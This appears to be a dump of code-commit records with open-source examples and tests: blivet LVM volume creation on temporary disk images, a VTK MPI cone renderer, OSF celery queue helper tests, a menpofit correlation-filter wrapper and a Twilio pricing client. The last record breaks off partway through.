b.config.disk_images["disk2"] = disk2_file
b.reset()
try:
disk1 = b.devicetree.get_device_by_name("disk1")
disk2 = b.devicetree.get_device_by_name("disk2")
b.initialize_disk(disk1)
b.initialize_disk(disk2)
pv = b.new_partition(size=Size("50GiB"), fmt_type="lvmpv", parents=[disk1])
b.create_device(pv)
pv2 = b.new_partition(size=Size("50GiB"), fmt_type="lvmpv", parents=[disk2])
b.create_device(pv2)
# allocate the partitions (decide where and on which disks they'll reside)
blivet.partitioning.do_partitioning(b)
vg = b.new_vg(parents=[pv, pv2])
b.create_device(vg)
# new lv with base size 5GiB and unbounded growth and an ext4 filesystem
dev = b.new_lv(fmt_type="ext4", size=Size("5GiB"), grow=True,
parents=[vg], name="unbounded")
b.create_device(dev)
# new lv with base size 5GiB and growth up to 15GiB and an ext4 filesystem
dev = b.new_lv(fmt_type="ext4", size=Size("5GiB"), grow=True,
maxsize=Size("15GiB"), parents=[vg], name="bounded")
b.create_device(dev)
# new lv with a fixed size of 2GiB formatted as swap space
dev = b.new_lv(fmt_type="swap", size=Size("2GiB"), parents=[vg], seg_type="raid1", pvs=[pv, pv2])
b.create_device(dev)
# allocate the growable lvs
blivet.partitioning.grow_lvm(b)
print_devices(b)
# write the new partitions to disk and format them as specified
b.do_it()
print_devices(b)
input("Check the state and hit ENTER to trigger cleanup")
finally:
b.devicetree.teardown_disk_images()
os.unlink(disk1_file)
os.unlink(disk2_file)
|
<commit_before><commit_msg>Add an example of non-linear LV creation
Useful for some manual testing as well as for people wondering how to do
something like that.<commit_after>import os
from examples.common import print_devices
import blivet
from blivet.size import Size
from blivet.util import set_up_logging, create_sparse_tempfile
set_up_logging()
b = blivet.Blivet() # create an instance of Blivet (don't add system devices)
# create a disk image file on which to create new devices
disk1_file = create_sparse_tempfile("disk1", Size("100GiB"))
b.config.disk_images["disk1"] = disk1_file
disk2_file = create_sparse_tempfile("disk2", Size("100GiB"))
b.config.disk_images["disk2"] = disk2_file
b.reset()
try:
disk1 = b.devicetree.get_device_by_name("disk1")
disk2 = b.devicetree.get_device_by_name("disk2")
b.initialize_disk(disk1)
b.initialize_disk(disk2)
pv = b.new_partition(size=Size("50GiB"), fmt_type="lvmpv", parents=[disk1])
b.create_device(pv)
pv2 = b.new_partition(size=Size("50GiB"), fmt_type="lvmpv", parents=[disk2])
b.create_device(pv2)
# allocate the partitions (decide where and on which disks they'll reside)
blivet.partitioning.do_partitioning(b)
vg = b.new_vg(parents=[pv, pv2])
b.create_device(vg)
# new lv with base size 5GiB and unbounded growth and an ext4 filesystem
dev = b.new_lv(fmt_type="ext4", size=Size("5GiB"), grow=True,
parents=[vg], name="unbounded")
b.create_device(dev)
# new lv with base size 5GiB and growth up to 15GiB and an ext4 filesystem
dev = b.new_lv(fmt_type="ext4", size=Size("5GiB"), grow=True,
maxsize=Size("15GiB"), parents=[vg], name="bounded")
b.create_device(dev)
# new lv with a fixed size of 2GiB formatted as swap space
dev = b.new_lv(fmt_type="swap", size=Size("2GiB"), parents=[vg], seg_type="raid1", pvs=[pv, pv2])
b.create_device(dev)
# allocate the growable lvs
blivet.partitioning.grow_lvm(b)
print_devices(b)
# write the new partitions to disk and format them as specified
b.do_it()
print_devices(b)
input("Check the state and hit ENTER to trigger cleanup")
finally:
b.devicetree.teardown_disk_images()
os.unlink(disk1_file)
os.unlink(disk2_file)
|
|
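The seg_type="raid1" plus explicit pvs=[pv, pv2] is what makes the swap LV non-linear: both the segment type and the mirror legs are pinned at creation time. A small follow-up sketch to confirm the layout after b.do_it() (attribute names as in blivet 2.x, hedged with getattr):

# Sketch: list the VG's LVs and their segment types after b.do_it().
for lv in getattr(vg, 'lvs', []):
    print(lv.name, lv.size, getattr(lv, 'seg_type', 'linear'))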
961817824ea3d030bc2fb50a0b97f76a525ffeb9
|
Examples/ParallelProcessing/MPI/Python/ParallelCone.py
|
Examples/ParallelProcessing/MPI/Python/ParallelCone.py
|
from vtk import *
import sys
import os
import time
myProcId = 0
numProcs = 1
compManager = vtkCompositeManager()
if compManager.GetController():
myProcId = compManager.GetController().GetLocalProcessId()
numProcs = compManager.GetController().GetNumberOfProcesses()
try:
v = vtkMesaRenderer()
if myProcId > 0:
_graphics_fact=vtkGraphicsFactory()
_graphics_fact.SetUseMesaClasses(1)
del _graphics_fact
del v
except Exception, (bar):
print "No mesa", bar
#print "I am process: %d / %d" % (myProcId, numProcs)
# create a rendering window and renderer
ren = vtkRenderer()
renWin = vtkRenderWindow()
renWin.AddRenderer(ren)
renWin.SetSize(300,300)
if myProcId:
renWin.OffScreenRenderingOn()
# create an actor and give it cone geometry
cone = vtkConeSource()
cone.SetResolution(8)
coneMapper = vtkPolyDataMapper()
coneMapper.SetInput(cone.GetOutput())
coneActor = vtkActor()
coneActor.SetMapper(coneMapper)
# assign our actor to the renderer
ren.AddActor(coneActor)
renWin.SetWindowName("I am node %d" % myProcId)
if numProcs > 1:
compManager.SetRenderWindow(renWin)
compManager.InitializePieces()
#print "Pid of process %d is %d" % (myProcId, os.getpid())
def ExitMaster(a, b):
#print "ExitMaster; I am %d / %d" % ( myProcId, numProcs )
if numProcs > 1 and myProcId == 0:
#print "Trigger exit RMI on all satellite nodes"
for a in range(1, numProcs):
#print "Trigger exit in satellite node %d" % a
compManager.GetController().TriggerRMI(a, 239954)
if myProcId == 0:
iren = vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
iren.AddObserver("ExitEvent", ExitMaster)
iren.Start()
#renWin.Render()
#renWin.Render()
#renWin.Render()
else:
compManager.InitializeRMIs()
compManager.GetController().ProcessRMIs()
compManager.GetController().Finalize()
#print "**********************************"
#print "Done on the slave node"
#print "**********************************"
sys.exit()
ExitMaster(0, 0)
#time.sleep(5)
|
Add example of parallel processing using python
|
Add example of parallel processing using python
|
Python
|
bsd-3-clause
|
johnkit/vtk-dev,jmerkow/VTK,SimVascular/VTK,spthaolt/VTK,keithroe/vtkoptix,msmolens/VTK,cjh1/VTK,gram526/VTK,mspark93/VTK,sgh/vtk,arnaudgelas/VTK,collects/VTK,keithroe/vtkoptix,sgh/vtk,gram526/VTK,Wuteyan/VTK,sankhesh/VTK,sankhesh/VTK,keithroe/vtkoptix,aashish24/VTK-old,johnkit/vtk-dev,sankhesh/VTK,sankhesh/VTK,collects/VTK,johnkit/vtk-dev,SimVascular/VTK,gram526/VTK,msmolens/VTK,arnaudgelas/VTK,collects/VTK,candy7393/VTK,keithroe/vtkoptix,ashray/VTK-EVM,naucoin/VTKSlicerWidgets,naucoin/VTKSlicerWidgets,msmolens/VTK,jmerkow/VTK,Wuteyan/VTK,sumedhasingla/VTK,keithroe/vtkoptix,Wuteyan/VTK,collects/VTK,sankhesh/VTK,hendradarwin/VTK,spthaolt/VTK,berendkleinhaneveld/VTK,biddisco/VTK,biddisco/VTK,johnkit/vtk-dev,hendradarwin/VTK,berendkleinhaneveld/VTK,cjh1/VTK,msmolens/VTK,jeffbaumes/jeffbaumes-vtk,Wuteyan/VTK,aashish24/VTK-old,sankhesh/VTK,hendradarwin/VTK,keithroe/vtkoptix,demarle/VTK,ashray/VTK-EVM,ashray/VTK-EVM,SimVascular/VTK,spthaolt/VTK,biddisco/VTK,arnaudgelas/VTK,berendkleinhaneveld/VTK,johnkit/vtk-dev,jmerkow/VTK,jeffbaumes/jeffbaumes-vtk,jmerkow/VTK,cjh1/VTK,jmerkow/VTK,ashray/VTK-EVM,sumedhasingla/VTK,mspark93/VTK,mspark93/VTK,jeffbaumes/jeffbaumes-vtk,aashish24/VTK-old,candy7393/VTK,sankhesh/VTK,jeffbaumes/jeffbaumes-vtk,sankhesh/VTK,candy7393/VTK,sumedhasingla/VTK,arnaudgelas/VTK,naucoin/VTKSlicerWidgets,candy7393/VTK,sgh/vtk,ashray/VTK-EVM,msmolens/VTK,spthaolt/VTK,gram526/VTK,msmolens/VTK,jeffbaumes/jeffbaumes-vtk,sgh/vtk,jmerkow/VTK,ashray/VTK-EVM,berendkleinhaneveld/VTK,candy7393/VTK,gram526/VTK,sumedhasingla/VTK,cjh1/VTK,cjh1/VTK,mspark93/VTK,mspark93/VTK,keithroe/vtkoptix,SimVascular/VTK,berendkleinhaneveld/VTK,demarle/VTK,berendkleinhaneveld/VTK,sumedhasingla/VTK,sgh/vtk,naucoin/VTKSlicerWidgets,sgh/vtk,demarle/VTK,mspark93/VTK,daviddoria/PointGraphsPhase1,ashray/VTK-EVM,demarle/VTK,cjh1/VTK,johnkit/vtk-dev,mspark93/VTK,hendradarwin/VTK,johnkit/vtk-dev,jmerkow/VTK,aashish24/VTK-old,spthaolt/VTK,SimVascular/VTK,hendradarwin/VTK,demarle/VTK,jeffbaumes/jeffbaumes-vtk,sumedhasingla/VTK,demarle/VTK,biddisco/VTK,daviddoria/PointGraphsPhase1,mspark93/VTK,ashray/VTK-EVM,SimVascular/VTK,arnaudgelas/VTK,demarle/VTK,gram526/VTK,gram526/VTK,daviddoria/PointGraphsPhase1,demarle/VTK,biddisco/VTK,hendradarwin/VTK,hendradarwin/VTK,berendkleinhaneveld/VTK,Wuteyan/VTK,biddisco/VTK,collects/VTK,candy7393/VTK,SimVascular/VTK,daviddoria/PointGraphsPhase1,candy7393/VTK,candy7393/VTK,sumedhasingla/VTK,SimVascular/VTK,msmolens/VTK,keithroe/vtkoptix,Wuteyan/VTK,naucoin/VTKSlicerWidgets,Wuteyan/VTK,biddisco/VTK,aashish24/VTK-old,daviddoria/PointGraphsPhase1,arnaudgelas/VTK,sumedhasingla/VTK,naucoin/VTKSlicerWidgets,gram526/VTK,spthaolt/VTK,msmolens/VTK,spthaolt/VTK,aashish24/VTK-old,daviddoria/PointGraphsPhase1,jmerkow/VTK,collects/VTK
|
Add example of parallel processing using python
|
from vtk import *
import sys
import os
import time
myProcId = 0
numProcs = 1
compManager = vtkCompositeManager()
if compManager.GetController():
myProcId = compManager.GetController().GetLocalProcessId()
numProcs = compManager.GetController().GetNumberOfProcesses()
try:
v = vtkMesaRenderer()
if myProcId > 0:
_graphics_fact=vtkGraphicsFactory()
_graphics_fact.SetUseMesaClasses(1)
del _graphics_fact
del v
except Exception, (bar):
print "No mesa", bar
#print "I am process: %d / %d" % (myProcId, numProcs)
# create a rendering window and renderer
ren = vtkRenderer()
renWin = vtkRenderWindow()
renWin.AddRenderer(ren)
renWin.SetSize(300,300)
if myProcId:
renWin.OffScreenRenderingOn()
# create an actor and give it cone geometry
cone = vtkConeSource()
cone.SetResolution(8)
coneMapper = vtkPolyDataMapper()
coneMapper.SetInput(cone.GetOutput())
coneActor = vtkActor()
coneActor.SetMapper(coneMapper)
# assign our actor to the renderer
ren.AddActor(coneActor)
renWin.SetWindowName("I am node %d" % myProcId)
if numProcs > 1:
compManager.SetRenderWindow(renWin)
compManager.InitializePieces()
#print "Pid of process %d is %d" % (myProcId, os.getpid())
def ExitMaster(a, b):
#print "ExitMaster; I am %d / %d" % ( myProcId, numProcs )
if numProcs > 1 and myProcId == 0:
#print "Trigger exit RMI on all satellite nodes"
for a in range(1, numProcs):
#print "Trigger exit in satellite node %d" % a
compManager.GetController().TriggerRMI(a, 239954)
if myProcId == 0:
iren = vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
iren.AddObserver("ExitEvent", ExitMaster)
iren.Start()
#renWin.Render()
#renWin.Render()
#renWin.Render()
else:
compManager.InitializeRMIs()
compManager.GetController().ProcessRMIs()
compManager.GetController().Finalize()
#print "**********************************"
#print "Done on the slave node"
#print "**********************************"
sys.exit()
ExitMaster(0, 0)
#time.sleep(5)
|
<commit_before><commit_msg>Add example of parallel processing using python<commit_after>
|
from vtk import *
import sys
import os
import time
myProcId = 0
numProcs = 1
compManager = vtkCompositeManager()
if compManager.GetController():
myProcId = compManager.GetController().GetLocalProcessId()
numProcs = compManager.GetController().GetNumberOfProcesses()
try:
v = vtkMesaRenderer()
if myProcId > 0:
_graphics_fact=vtkGraphicsFactory()
_graphics_fact.SetUseMesaClasses(1)
del _graphics_fact
del v
except Exception, (bar):
print "No mesa", bar
#print "I am process: %d / %d" % (myProcId, numProcs)
# create a rendering window and renderer
ren = vtkRenderer()
renWin = vtkRenderWindow()
renWin.AddRenderer(ren)
renWin.SetSize(300,300)
if myProcId:
renWin.OffScreenRenderingOn()
# create an actor and give it cone geometry
cone = vtkConeSource()
cone.SetResolution(8)
coneMapper = vtkPolyDataMapper()
coneMapper.SetInput(cone.GetOutput())
coneActor = vtkActor()
coneActor.SetMapper(coneMapper)
# assign our actor to the renderer
ren.AddActor(coneActor)
renWin.SetWindowName("I am node %d" % myProcId)
if numProcs > 1:
compManager.SetRenderWindow(renWin)
compManager.InitializePieces()
#print "Pid of process %d is %d" % (myProcId, os.getpid())
def ExitMaster(a, b):
#print "ExitMaster; I am %d / %d" % ( myProcId, numProcs )
if numProcs > 1 and myProcId == 0:
#print "Trigger exit RMI on all satellite nodes"
for a in range(1, numProcs):
#print "Trigger exit in satellite node %d" % a
compManager.GetController().TriggerRMI(a, 239954)
if myProcId == 0:
iren = vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
iren.AddObserver("ExitEvent", ExitMaster)
iren.Start()
#renWin.Render()
#renWin.Render()
#renWin.Render()
else:
compManager.InitializeRMIs()
compManager.GetController().ProcessRMIs()
compManager.GetController().Finalize()
#print "**********************************"
#print "Done on the slave node"
#print "**********************************"
sys.exit()
ExitMaster(0, 0)
#time.sleep(5)
|
Add example of parallel processing using pythonfrom vtk import *
import sys
import os
import time
myProcId = 0
numProcs = 1
compManager = vtkCompositeManager()
if compManager.GetController():
myProcId = compManager.GetController().GetLocalProcessId()
numProcs = compManager.GetController().GetNumberOfProcesses()
try:
v = vtkMesaRenderer()
if myProcId > 0:
_graphics_fact=vtkGraphicsFactory()
_graphics_fact.SetUseMesaClasses(1)
del _graphics_fact
del v
except Exception, (bar):
print "No mesa", bar
#print "I am process: %d / %d" % (myProcId, numProcs)
# create a rendering window and renderer
ren = vtkRenderer()
renWin = vtkRenderWindow()
renWin.AddRenderer(ren)
renWin.SetSize(300,300)
if myProcId:
renWin.OffScreenRenderingOn()
# create an actor and give it cone geometry
cone = vtkConeSource()
cone.SetResolution(8)
coneMapper = vtkPolyDataMapper()
coneMapper.SetInput(cone.GetOutput())
coneActor = vtkActor()
coneActor.SetMapper(coneMapper)
# assign our actor to the renderer
ren.AddActor(coneActor)
renWin.SetWindowName("I am node %d" % myProcId)
if numProcs > 1:
compManager.SetRenderWindow(renWin)
compManager.InitializePieces()
#print "Pid of process %d is %d" % (myProcId, os.getpid())
def ExitMaster(a, b):
#print "ExitMaster; I am %d / %d" % ( myProcId, numProcs )
if numProcs > 1 and myProcId == 0:
#print "Trigger exit RMI on all satellite nodes"
for a in range(1, numProcs):
#print "Trigger exit in satellite node %d" % a
compManager.GetController().TriggerRMI(a, 239954)
if myProcId == 0:
iren = vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
iren.AddObserver("ExitEvent", ExitMaster)
iren.Start()
#renWin.Render()
#renWin.Render()
#renWin.Render()
else:
compManager.InitializeRMIs()
compManager.GetController().ProcessRMIs()
compManager.GetController().Finalize()
#print "**********************************"
#print "Done on the slave node"
#print "**********************************"
sys.exit()
ExitMaster(0, 0)
#time.sleep(5)
|
<commit_before><commit_msg>Add example of parallel processing using python<commit_after>from vtk import *
import sys
import os
import time
myProcId = 0
numProcs = 1
compManager = vtkCompositeManager()
if compManager.GetController():
myProcId = compManager.GetController().GetLocalProcessId()
numProcs = compManager.GetController().GetNumberOfProcesses()
try:
v = vtkMesaRenderer()
if myProcId > 0:
_graphics_fact=vtkGraphicsFactory()
_graphics_fact.SetUseMesaClasses(1)
del _graphics_fact
del v
except Exception, (bar):
print "No mesa", bar
#print "I am process: %d / %d" % (myProcId, numProcs)
# create a rendering window and renderer
ren = vtkRenderer()
renWin = vtkRenderWindow()
renWin.AddRenderer(ren)
renWin.SetSize(300,300)
if myProcId:
renWin.OffScreenRenderingOn()
# create an actor and give it cone geometry
cone = vtkConeSource()
cone.SetResolution(8)
coneMapper = vtkPolyDataMapper()
coneMapper.SetInput(cone.GetOutput())
coneActor = vtkActor()
coneActor.SetMapper(coneMapper)
# assign our actor to the renderer
ren.AddActor(coneActor)
renWin.SetWindowName("I am node %d" % myProcId)
if numProcs > 1:
compManager.SetRenderWindow(renWin)
compManager.InitializePieces()
#print "Pid of process %d is %d" % (myProcId, os.getpid())
def ExitMaster(a, b):
#print "ExitMaster; I am %d / %d" % ( myProcId, numProcs )
if numProcs > 1 and myProcId == 0:
#print "Trigger exit RMI on all satellite nodes"
for a in range(1, numProcs):
#print "Trigger exit in satellite node %d" % a
compManager.GetController().TriggerRMI(a, 239954)
if myProcId == 0:
iren = vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
iren.AddObserver("ExitEvent", ExitMaster)
iren.Start()
#renWin.Render()
#renWin.Render()
#renWin.Render()
else:
compManager.InitializeRMIs()
compManager.GetController().ProcessRMIs()
compManager.GetController().Finalize()
#print "**********************************"
#print "Done on the slave node"
#print "**********************************"
sys.exit()
ExitMaster(0, 0)
#time.sleep(5)
|
|
9d105a62b29f0cd170343705bbe20c509d523e46
|
osf_tests/test_handlers.py
|
osf_tests/test_handlers.py
|
import pytest
from nose.tools import assert_raises
from framework.celery_tasks import handlers
from website.project.tasks import on_node_updated
class TestCeleryHandlers:
@pytest.fixture()
def queue(self):
return handlers.queue()
def test_get_task_from_queue_not_there(self):
task = handlers.get_task_from_queue(
'website.project.tasks.on_node_updated',
predicate=lambda task: task.kwargs['node_id'] == 'woop'
)
assert task is False
def test_get_task_from_queue(self, queue):
handlers.queue().append(
on_node_updated.s(node_id='woop', user_id='heyyo', first_save=False, saved_fields={'contributors'})
)
task = handlers.get_task_from_queue(
'website.project.tasks.on_node_updated',
predicate=lambda task: task.kwargs['node_id'] == 'woop'
)
assert task
def test_get_task_from_queue_errors_with_two_tasks(self, queue):
tasks = [
on_node_updated.s(node_id='woop', user_id='heyyo', first_save=False, saved_fields={'title'}),
on_node_updated.s(node_id='woop', user_id='heyyo', first_save=False, saved_fields={'contributors'})
]
queue += tasks
with assert_raises(ValueError):
handlers.get_task_from_queue(
'website.project.tasks.on_node_updated',
predicate=lambda task: task.kwargs['node_id'] == 'woop'
)
|
Add tests for new get_task_from_queue celery helper
|
Add tests for new get_task_from_queue celery helper
|
Python
|
apache-2.0
|
cslzchen/osf.io,caseyrollins/osf.io,mattclark/osf.io,aaxelb/osf.io,Johnetordoff/osf.io,pattisdr/osf.io,erinspace/osf.io,erinspace/osf.io,sloria/osf.io,pattisdr/osf.io,mfraezz/osf.io,caseyrollins/osf.io,cslzchen/osf.io,mattclark/osf.io,cslzchen/osf.io,felliott/osf.io,felliott/osf.io,brianjgeiger/osf.io,Johnetordoff/osf.io,mfraezz/osf.io,adlius/osf.io,saradbowman/osf.io,baylee-d/osf.io,cslzchen/osf.io,adlius/osf.io,CenterForOpenScience/osf.io,icereval/osf.io,aaxelb/osf.io,HalcyonChimera/osf.io,baylee-d/osf.io,mattclark/osf.io,CenterForOpenScience/osf.io,sloria/osf.io,CenterForOpenScience/osf.io,erinspace/osf.io,Johnetordoff/osf.io,HalcyonChimera/osf.io,baylee-d/osf.io,CenterForOpenScience/osf.io,saradbowman/osf.io,pattisdr/osf.io,brianjgeiger/osf.io,adlius/osf.io,Johnetordoff/osf.io,caseyrollins/osf.io,HalcyonChimera/osf.io,aaxelb/osf.io,mfraezz/osf.io,aaxelb/osf.io,felliott/osf.io,icereval/osf.io,felliott/osf.io,sloria/osf.io,HalcyonChimera/osf.io,mfraezz/osf.io,brianjgeiger/osf.io,adlius/osf.io,brianjgeiger/osf.io,icereval/osf.io
|
Add tests for new get_task_from_queue celery helper
|
import pytest
from nose.tools import assert_raises
from framework.celery_tasks import handlers
from website.project.tasks import on_node_updated
class TestCeleryHandlers:
@pytest.fixture()
def queue(self):
return handlers.queue()
def test_get_task_from_queue_not_there(self):
task = handlers.get_task_from_queue(
'website.project.tasks.on_node_updated',
predicate=lambda task: task.kwargs['node_id'] == 'woop'
)
assert task is False
def test_get_task_from_queue(self, queue):
handlers.queue().append(
on_node_updated.s(node_id='woop', user_id='heyyo', first_save=False, saved_fields={'contributors'})
)
task = handlers.get_task_from_queue(
'website.project.tasks.on_node_updated',
predicate=lambda task: task.kwargs['node_id'] == 'woop'
)
assert task
def test_get_task_from_queue_errors_with_two_tasks(self, queue):
tasks = [
on_node_updated.s(node_id='woop', user_id='heyyo', first_save=False, saved_fields={'title'}),
on_node_updated.s(node_id='woop', user_id='heyyo', first_save=False, saved_fields={'contributors'})
]
queue += tasks
with assert_raises(ValueError):
handlers.get_task_from_queue(
'website.project.tasks.on_node_updated',
predicate=lambda task: task.kwargs['node_id'] == 'woop'
)
|
<commit_before><commit_msg>Add tests for new get_task_from_queue celery helper<commit_after>
|
import pytest
from nose.tools import assert_raises
from framework.celery_tasks import handlers
from website.project.tasks import on_node_updated
class TestCeleryHandlers:
@pytest.fixture()
def queue(self):
return handlers.queue()
def test_get_task_from_queue_not_there(self):
task = handlers.get_task_from_queue(
'website.project.tasks.on_node_updated',
predicate=lambda task: task.kwargs['node_id'] == 'woop'
)
assert task is False
def test_get_task_from_queue(self, queue):
handlers.queue().append(
on_node_updated.s(node_id='woop', user_id='heyyo', first_save=False, saved_fields={'contributors'})
)
task = handlers.get_task_from_queue(
'website.project.tasks.on_node_updated',
predicate=lambda task: task.kwargs['node_id'] == 'woop'
)
assert task
def test_get_task_from_queue_errors_with_two_tasks(self, queue):
tasks = [
on_node_updated.s(node_id='woop', user_id='heyyo', first_save=False, saved_fields={'title'}),
on_node_updated.s(node_id='woop', user_id='heyyo', first_save=False, saved_fields={'contributors'})
]
queue += tasks
with assert_raises(ValueError):
handlers.get_task_from_queue(
'website.project.tasks.on_node_updated',
predicate=lambda task: task.kwargs['node_id'] == 'woop'
)
|
Add tests for new get_task_from_queue celery helperimport pytest
from nose.tools import assert_raises
from framework.celery_tasks import handlers
from website.project.tasks import on_node_updated
class TestCeleryHandlers:
@pytest.fixture()
def queue(self):
return handlers.queue()
def test_get_task_from_queue_not_there(self):
task = handlers.get_task_from_queue(
'website.project.tasks.on_node_updated',
predicate=lambda task: task.kwargs['node_id'] == 'woop'
)
assert task is False
def test_get_task_from_queue(self, queue):
handlers.queue().append(
on_node_updated.s(node_id='woop', user_id='heyyo', first_save=False, saved_fields={'contributors'})
)
task = handlers.get_task_from_queue(
'website.project.tasks.on_node_updated',
predicate=lambda task: task.kwargs['node_id'] == 'woop'
)
assert task
def test_get_task_from_queue_errors_with_two_tasks(self, queue):
tasks = [
on_node_updated.s(node_id='woop', user_id='heyyo', first_save=False, saved_fields={'title'}),
on_node_updated.s(node_id='woop', user_id='heyyo', first_save=False, saved_fields={'contributors'})
]
queue += tasks
with assert_raises(ValueError):
handlers.get_task_from_queue(
'website.project.tasks.on_node_updated',
predicate=lambda task: task.kwargs['node_id'] == 'woop'
)
|
<commit_before><commit_msg>Add tests for new get_task_from_queue celery helper<commit_after>import pytest
from nose.tools import assert_raises
from framework.celery_tasks import handlers
from website.project.tasks import on_node_updated
class TestCeleryHandlers:
@pytest.fixture()
def queue(self):
return handlers.queue()
def test_get_task_from_queue_not_there(self):
task = handlers.get_task_from_queue(
'website.project.tasks.on_node_updated',
predicate=lambda task: task.kwargs['node_id'] == 'woop'
)
assert task is False
def test_get_task_from_queue(self, queue):
handlers.queue().append(
on_node_updated.s(node_id='woop', user_id='heyyo', first_save=False, saved_fields={'contributors'})
)
task = handlers.get_task_from_queue(
'website.project.tasks.on_node_updated',
predicate=lambda task: task.kwargs['node_id'] == 'woop'
)
assert task
def test_get_task_from_queue_errors_with_two_tasks(self, queue):
tasks = [
on_node_updated.s(node_id='woop', user_id='heyyo', first_save=False, saved_fields={'title'}),
on_node_updated.s(node_id='woop', user_id='heyyo', first_save=False, saved_fields={'contributors'})
]
queue += tasks
with assert_raises(ValueError):
handlers.get_task_from_queue(
'website.project.tasks.on_node_updated',
predicate=lambda task: task.kwargs['node_id'] == 'woop'
)
|
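A minimal sketch of what the helper under test might look like, reconstructed only from the assertions above (returns False when nothing matches, the single matching task otherwise, and raises ValueError on duplicates); the real implementation lives in framework.celery_tasks.handlers and may differ:

def get_task_from_queue(name, predicate):
    # Hypothetical reconstruction from the tests. Celery Signature objects
    # expose the task name as .task and the keyword arguments as .kwargs,
    # and handlers.queue() returns the list-like queue the tests append to.
    matches = [sig for sig in queue() if sig.task == name and predicate(sig)]
    if len(matches) > 1:
        raise ValueError('More than one queued task matched the predicate.')
    return matches[0] if matches else False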
|
8d08a7caeb4da705b2ab5a6f55528d1beae5bedb
|
menpofit/clm/expert/base.py
|
menpofit/clm/expert/base.py
|
import numpy as np
from menpofit.math.correlationfilter import mccf, imccf
# TODO: document me!
class IncrementalCorrelationFilterThinWrapper(object):
r"""
"""
def __init__(self, cf_callable=mccf, icf_callable=imccf):
self.cf_callable = cf_callable
self.icf_callable = icf_callable
def increment(self, A, B, n_x, Z, t):
r"""
"""
# Turn list of X into ndarray
if isinstance(Z, list):
Z = np.asarray(Z)
return self.icf_callable(A, B, n_x, Z, t)
def train(self, X, t):
r"""
"""
# Turn list of X into ndarray
if isinstance(X, list):
X = np.asarray(X)
# Return linear svm filter and bias
return self.cf_callable(X, t)
|
Add dummy wrapper for correlation filters
|
Add dummy wrapper for correlation filters
|
Python
|
bsd-3-clause
|
yuxiang-zhou/menpofit,yuxiang-zhou/menpofit,grigorisg9gr/menpofit,grigorisg9gr/menpofit
|
Add dummy wrapper for correlation filters
|
import numpy as np
from menpofit.math.correlationfilter import mccf, imccf
# TODO: document me!
class IncrementalCorrelationFilterThinWrapper(object):
r"""
"""
def __init__(self, cf_callable=mccf, icf_callable=imccf):
self.cf_callable = cf_callable
self.icf_callable = icf_callable
def increment(self, A, B, n_x, Z, t):
r"""
"""
# Turn list of X into ndarray
if isinstance(Z, list):
Z = np.asarray(Z)
return self.icf_callable(A, B, n_x, Z, t)
def train(self, X, t):
r"""
"""
# Turn list of X into ndarray
if isinstance(X, list):
X = np.asarray(X)
# Return linear svm filter and bias
return self.cf_callable(X, t)
|
<commit_before><commit_msg>Add dummy wrapper for correlation filters<commit_after>
|
import numpy as np
from menpofit.math.correlationfilter import mccf, imccf
# TODO: document me!
class IncrementalCorrelationFilterThinWrapper(object):
r"""
"""
def __init__(self, cf_callable=mccf, icf_callable=imccf):
self.cf_callable = cf_callable
self.icf_callable = icf_callable
def increment(self, A, B, n_x, Z, t):
r"""
"""
# Turn list of X into ndarray
if isinstance(Z, list):
Z = np.asarray(Z)
return self.icf_callable(A, B, n_x, Z, t)
def train(self, X, t):
r"""
"""
# Turn list of X into ndarray
if isinstance(X, list):
X = np.asarray(X)
# Return linear svm filter and bias
return self.cf_callable(X, t)
|
Add dummy wrapper for correlation filtersimport numpy as np
from menpofit.math.correlationfilter import mccf, imccf
# TODO: document me!
class IncrementalCorrelationFilterThinWrapper(object):
r"""
"""
def __init__(self, cf_callable=mccf, icf_callable=imccf):
self.cf_callable = cf_callable
self.icf_callable = icf_callable
def increment(self, A, B, n_x, Z, t):
r"""
"""
# Turn list of X into ndarray
if isinstance(Z, list):
Z = np.asarray(Z)
return self.icf_callable(A, B, n_x, Z, t)
def train(self, X, t):
r"""
"""
# Turn list of X into ndarray
if isinstance(X, list):
X = np.asarray(X)
# Return linear svm filter and bias
return self.cf_callable(X, t)
|
<commit_before><commit_msg>Add dummy wrapper for correlation filters<commit_after>import numpy as np
from menpofit.math.correlationfilter import mccf, imccf
# TODO: document me!
class IncrementalCorrelationFilterThinWrapper(object):
r"""
"""
def __init__(self, cf_callable=mccf, icf_callable=imccf):
self.cf_callable = cf_callable
self.icf_callable = icf_callable
def increment(self, A, B, n_x, Z, t):
r"""
"""
# Turn list of X into ndarray
if isinstance(Z, list):
Z = np.asarray(Z)
return self.icf_callable(A, B, n_x, Z, t)
def train(self, X, t):
r"""
"""
# Turn list of X into ndarray
if isinstance(X, list):
X = np.asarray(X)
# Return linear svm filter and bias
return self.cf_callable(X, t)
|
|
f41e79f52a136eb9685a028e31628766015834b0
|
twilio/rest/pricing/__init__.py
|
twilio/rest/pricing/__init__.py
|
from twilio.rest.base import TwilioClient
from twilio.rest.resources import UNSET_TIMEOUT
from .phone_numbers import PhoneNumbers
from .voice import Voice
class TwilioPricingClient(TwilioClient):
"""
A client for accessing the Twilio Pricing API.
:param str account: Your Account SID from `your dashboard
<https://twilio.com/user/account>`_
:param str token: Your Auth Token from `your dashboard
<https://twilio.com/user_account>`_
:param float timeout: The socket connect and read timeout for requests
to Twilio
"""
def __init__(self, account=None, token=None,
base="https://pricing.twilio.com", version="v1",
timeout=UNSET_TIMEOUT):
super(TwilioPricingClient, self).__init__(account, token, base,
version, timeout)
uri_base = "{}/{}".format(base, version)
self.voice = Voice(uri_base, self.auth, self.timeout)
self.phone_numbers = PhoneNumbers(uri_base, self.auth, self.timeout)
|
Move pricing client into pricing init
|
Move pricing client into pricing init
|
Python
|
mit
|
tysonholub/twilio-python,twilio/twilio-python
|
Move pricing client into pricing init
|
from twilio.rest.base import TwilioClient
from twilio.rest.resources import UNSET_TIMEOUT
from .phone_numbers import PhoneNumbers
from .voice import Voice
class TwilioPricingClient(TwilioClient):
"""
A client for accessing the Twilio Pricing API.
:param str account: Your Account SID from `your dashboard
<https://twilio.com/user/account>`_
:param str token: Your Auth Token from `your dashboard
<https://twilio.com/user_account>`_
:param float timeout: The socket connect and read timeout for requests
to Twilio
"""
def __init__(self, account=None, token=None,
base="https://pricing.twilio.com", version="v1",
timeout=UNSET_TIMEOUT):
super(TwilioPricingClient, self).__init__(account, token, base,
version, timeout)
uri_base = "{}/{}".format(base, version)
